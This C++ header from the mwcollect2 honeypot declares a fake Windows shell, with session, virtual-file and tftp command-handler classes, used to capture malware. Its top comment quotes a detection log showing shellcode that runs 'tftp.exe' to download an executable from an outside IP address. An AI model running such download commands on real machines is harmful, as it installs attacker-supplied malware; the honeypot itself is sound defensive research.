/* mwcollect2 (c) 2004-2005 Honeynet Project
 * this code is licensed under the BSD License, the the file LICENSE for details
 *
 * shell.h - the shellcode shell emulation
 *
 * 22:02 < mwc-thorshammer> DCOM Shellcode starts at byte 0x0370 and is 0x01DC bytes long.
 * 22:02 < mwc-thorshammer> Detected generic XOR Decoder, key is 12h, code is ebh (ebh) bytes long.
 * 22:02 < mwc-thorshammer> Detected generic CreateProcess Shellcode: "tftp.exe -i 84.44.132.47 get SystemReg16.exe"
 *
 * ^ a bit motivating, isn't it?
 *
 */

#include "mwcollectd.h"

#include <list>
#include <string>
#include <pcre.h>

#define WIN32_HEADER "Microsoft Windows 2000 [Version 5.00.2195]\n(C) Copyright 1985-2000 Microsoft Corp.\n\nC:\\WINDOWS\\System32>"

namespace mwcollectd
{
	class ShellSession;

	typedef enum
	{
		FT_EXECUTABLE = 0,
		FT_TEXT,
	} filetype_t;

	class VirtualShellFile
	{
	public:
		VirtualShellFile(const char * szFileName, filetype_t ftType)
		{ m_szName = strdup(szFileName); m_ftType = ftType; }
		~VirtualShellFile() { free(m_szName); }

		void appendText(const char * szLine) { m_sContent += szLine; }
		void setContent(const char * szContent) { m_sContent = szContent; }
		const char * getContent() { return m_sContent.c_str(); }

		const char * fileName() { return m_szName; }
		filetype_t fileType() { return m_ftType; }

	protected:
		filetype_t m_ftType;
		char * m_szName;

		std::string m_sContent;
	};
	
	class ShellCommandHandler
	{
	public:
		virtual void perform(const char * szCommandLine, ShellSession * pSession) = 0;
	};

	class ShellEmulation
	{
	public:
		ShellEmulation(MalwareCollector * pCollector) { m_pCollector = pCollector; }
		virtual ~ShellEmulation() { };

		void setConfiguration(Configuration * pConfig) { m_pConfig = pConfig; }
		void setLogManager(LogManager * pLogManager) { m_pLogManager = pLogManager; }

		void start();
		void loop();
		void stop();

		virtual ShellSession * createSession(unsigned long ulRemote);
		virtual ShellSession * listenSession(unsigned short usPort);
		virtual ShellSession * connectSession(unsigned long ulRemoteAddress, unsigned short usRemotePort);

		virtual void executeCommand(const char * szCommandLine, ShellSession * pSession);
		virtual void destroySession(ShellSession * pSession);

		virtual void registerCommand(char * szTrigger, ShellCommandHandler * pHandler);

		static void * connectionNotifier(int iHandle, unsigned long ulSourceAddress, unsigned short usSourcePort, unsigned short usLocalPort, void * pUserData);
		static void connectedNotifier(int iHandle, unsigned short usDestPort, void * pUserData);
		static void incomingNotifier(int iHandle, unsigned char * pucPacketData, unsigned int nPacketLength, void * pParam);
		static void terminationNotifier(bool bServer, void * pParam);

	protected:
		void addBuiltin();

	protected:
		MalwareCollector * m_pCollector;
		LogManager * m_pLogManager;
		Configuration * m_pConfig;

		std::list<ShellCommandHandler *> m_lpHandlers;
		std::list<char *> m_lszTriggers;
	};

	class ShellSession
	{
	public:
		ShellSession(unsigned long ulRemoteAddress, bool bInteractive, ShellEmulation * pFather, MalwareCollector * pColl)		
		{ m_ulRemote = ulRemoteAddress; m_bInteractive = bInteractive; m_pFather = pFather; m_pCollector = pColl; }
		ShellSession(ShellSession * p)
		{ m_ulRemote = p->getRemoteAddress(); m_bInteractive = p->isInteractive(); m_pFather = p->getFather(); m_pCollector = p->getCollector(); }
		~ShellSession() { }

		unsigned long getRemoteAddress() { return m_ulRemote; }
		void setRemoteAddress(unsigned long peter) { m_ulRemote = peter; }
		bool isInteractive() { return m_bInteractive; }
		ShellEmulation * getFather() { return m_pFather; }
		MalwareCollector * getCollector() { return m_pCollector; }

		void processBuffer() { m_pFather->executeCommand(m_sCommandBuffer.c_str(), this); m_sCommandBuffer.erase(); }

		void sendHeader();

		std::string m_sCommandBuffer;
		int m_iSocket;

		// vfs

		void addFile(const char * szName, filetype_t);
		bool hasBinary(const char * szCommandLine);

	protected:
		unsigned long m_ulRemote;
		bool m_bInteractive;

		MalwareCollector * m_pCollector;
		ShellEmulation * m_pFather;

		//std::list<VirtualShellFile> m_lvfFileSystem;
	};

	// builtin handlers, e.g. tftp.exe, echo etc.

	class TftpCommandHandler : public ShellCommandHandler
	{
	public:
		TftpCommandHandler(MalwareCollector * pCollector, LogManager * pLogManager);

		virtual void perform(const char * szCommandLine, ShellSession * pSession);

	protected:
		MalwareCollector * m_pCollector;
		LogManager * m_pLogManager;

		pcre * m_pPattern;
	};

	class BasicCommandHandler : public ShellCommandHandler
	{
	public:
		BasicCommandHandler(LogManager * pLogManager)
		{ m_pLogManager = pLogManager; }

		virtual void perform(const char * szCommandLine, ShellSession * pSession);

	protected:
		LogManager * m_pLogManager;
	};
}
